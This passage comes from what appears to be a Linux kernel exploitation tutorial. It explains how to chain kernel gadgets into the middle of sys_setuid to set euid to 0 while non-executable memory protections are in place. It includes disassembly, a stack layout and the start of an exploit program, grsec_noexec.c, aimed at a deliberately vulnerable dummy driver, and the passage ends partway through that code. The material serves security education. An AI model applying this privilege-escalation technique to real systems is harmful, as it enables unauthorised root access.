The idea behind is not much different from the theory behind
'ret-into-libc' or other userland exploiting approaches that 
attempt to
circumvent the non executability of heap and stack : as we know, 
Linux
associates credentials to each process in term of numeric values :

< linux-2.6.15/include/linux/sched.h >

struct task_struct {
[...]
/* process credentials */
        uid_t uid,euid,suid,fsuid;
        gid_t gid,egid,sgid,fsgid;
[...]
}

< / > 

Sometimes a process needs to raise (or drop, for security reasons) 
its
credentials, so the kernel exports systemcalls to do that. 
One of those is sys_setuid :

< linux-2.6.15/kernel/sys.c >

asmlinkage long sys_setuid(uid_t uid)
{
        int old_euid = current->euid;
        int old_ruid, old_suid, new_ruid, new_suid;
        int retval;

        retval = security_task_setuid(uid, (uid_t)-1, (uid_t)-1,
LSM_SETID_ID);
        if (retval)
                return retval;

        old_ruid = new_ruid = current->uid;
        old_suid = current->suid;
        new_suid = old_suid;

        if (capable(CAP_SETUID)) {              [1]
                if (uid != old_ruid && set_user(uid, old_euid != 
uid) < 0)
                        return -EAGAIN;
                new_suid = uid;
        } else if ((uid != current->uid) && (uid != new_suid))
                return -EPERM;

        if (old_euid != uid)
        {
                current->mm->dumpable = suid_dumpable;
                smp_wmb();
        }
        current->fsuid = current->euid = uid;    [2] 
        current->suid = new_suid;

        key_fsuid_changed(current);
        proc_id_connector(current, PROC_EVENT_UID);

        return security_task_post_setuid(old_ruid, old_euid, 
old_suid,
LSM_SETID_ID);
}

< / > 

As you can see, the 'security' checks (out of the LSM security_* 
entry
points) are performed at [1] and after those, at [2] the values of 
fsuid
and euid are set equal to the value passed to the function. 
sys_setuid is a system call, so, due to systemcall convention, 
parameters
are passed in register. More precisely, 'uid' will be passed in 
'%ebx'. 
The idea is so simple (and not different from 'ret-into-libc' [19] 
or 
other userspace page protection evading tecniques like [20]), if we 
manage
to have 0 into %ebx and to jump right in the middle of sys_setuid 
(and
right after the checks) we should be able to change the 'euid' and 
'fsuid'
of our process and thus raise our priviledges. 

Let's see the sys_setuid disassembly to better tune our idea :

[...]
c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax  [1]
c0120fd5:       21 e0                   and    %esp,%eax
c0120fd7:       8b 10                   mov    (%eax),%edx
c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)  [2]
c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
c0120fe5:       8b 00                   mov    (%eax),%eax
c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
c0120fed:       6a 01                   push   $0x1
c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
c0120ff3:       50                      push   %eax
c0120ff4:       55                      push   %ebp
c0120ff5:       57                      push   %edi
c0120ff6:       e8 65 ce 0c 00          call   c01ede60
c0120ffb:       89 c2                   mov    %eax,%edx
c0120ffd:       83 c4 10                add    $0x10,%esp        
[3]  
c0121000:       89 d0                   mov    %edx,%eax
c0121002:       5e                      pop    %esi
c0121003:       5b                      pop    %ebx
c0121004:       5e                      pop    %esi
c0121005:       5f                      pop    %edi
c0121006:       5d                      pop    %ebp
c0121007:       c3                      ret


At [1] the current process task_struct is taken from the kernel 
stack
value. At [2] the %ebx value is copied over the 'euid' and 'fsuid' 
members
of the struct. We have our return address, which is [1]. 
At that point we need to force somehow %ebx into being 0 (if we're 
not
lucky enough to have it already zero'ed).

To demonstrate this vulnerability we have used the local exploitable
buffer overflow in dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
command). Since it's a stack based overflow we can chain multiple 
return
address preparing a fake stack frame that we totally control. 
We need : 

 - a zero'ed %ebx : the easiest way to achieve that is to find a 
pop %ebx
   followed by a ret instruction [we control the stack] : 

        ret-to-pop-ebx:
                [*] c0100cd3:       5b      pop    %ebx
                [*] c0100cd4:       c3      ret
    
   we don't strictly need pop %ebx directly followed by ret, we may 
find a
   sequence of pops before the ret (and, among those, our pop 
%ebx). It is
   just a matter of preparing the right ZERO-layout for the pop 
sequence
   (to make it simple, add a ZERO 4-bytes sequence for any pop 
between the
   %ebx one and the ret)    

 - the return addr where to jump, which is the [1] address shown 
above

 - a 'ret-to-ret' padding to take care of the stack gap created at 
[3] by
   the function epilogue (%esp adding and register popping) :
        
        ret-to-ret pad:
                [*] 0xffffe413      c3      ret 

   (we could have used the above ret aswell, this one is into 
vsyscall
    page and was used in other exploit where we didn't need so much
    knowledge of the kernel .text.. it survived here :) )

 - the address of an iret instruction to return to userland (and a 
crafted
   stack frame for it, as we described above while discussing 'Stack
   Based' explotation) :

        ret-to-iret:
                [*] c013403f:       cf      iret


Putting all together this is how our 'stack' should look like to 
perform a
correct explotation :

low addresses
            +----------------+
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............. |
            | ret-to-pop ebx |
            | 0x00000000     |
            | ret-to-setuid  |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | ret-to-ret pad |
            | .............  |
            | .............  |
            | ret-to-iret    |
            | fake-iret-frame|
            +----------------+
high addresses


Once correctly returned to userspace we have successfully modified 
'fsuid'
and 'euid' value, but our 'ruid' is still the original one. At that 
point
we simply re-exec ourselves to get euid=0 and then spawn the shell. 
Code follows :

< stuff/expl/grsec_noexec.c >

#include <sys/ioctl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90
#define PAGE_SIZE 0x1000
#define STACK_SIZE 8192
//#define STACK_SIZE 4096


#define STACK_MASK ~(STACK_SIZE -1)
/* patch it at runtime */


#define ALTERNATE_STACK 0x00BBBBBB

/*2283d*/
#define RET_INTO_RET_STR   "\x3d\x28\x02\x00"
#define DUMMY              RET_INTO_RET_STR
#define ZERO               "\x00\x00\x00\x00"

/* 22ad3 */
#define RET_INTO_POP_EBX   "\xd3\x2a\x02\x00"
/* 1360 */
#define RET_INTO_IRET      "\x60\x13\x00\x00"
/* 227fc */
#define RET_INTO_SETUID    "\xfc\x27\x02\x00"

// do_eip at .text offset (rivedere)
// 0804864f
#define USER_CODE_OFFSET   "\x4f\x86\x04\x08"
#define USER_CODE_SEGMENT  "\x73\x00\x00\x00"
#define USER_EFLAGS        "\x46\x02\x00\x00"
#define USER_STACK_OFFSET  "\xbb\xbb\xbb\x00"
#define USER_STACK_SEGMENT "\x7b\x00\x00\x00"


/* sys_setuid - grsec kernel */
/*
   227fc:       89 e2                   mov    %esp,%edx
   227fe:       89 f1                   mov    %esi,%ecx
   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
   22806:       8b 02                   mov    (%edx),%eax
   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
   22814:       8b 02                   mov    (%edx),%eax
   22816:       89 fa                   mov    %edi,%edx
   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
   22825:       00
   22826:       8b 04 24                mov    (%esp),%eax
   22829:       5d                      pop    %ebp
   2282a:       5b                      pop    %ebx
   2282b:       5e                      pop    %esi
   2282c:       5f                      pop    %edi
   2282d:       5d                      pop    %ebp
   2282e:       e9 ef d5 0c 00          jmp    efe22
<cap_task_post_setuid>
   22833:       83 ca ff                or     $0xffffffff,%edx
   22836:       89 d0                   mov    %edx,%eax
   22838:       5f                      pop    %edi
   22839:       5b                      pop    %ebx
   2283a:       5e                      pop    %esi
   2283b:       5f                      pop    %edi
   2283c:       5d                      pop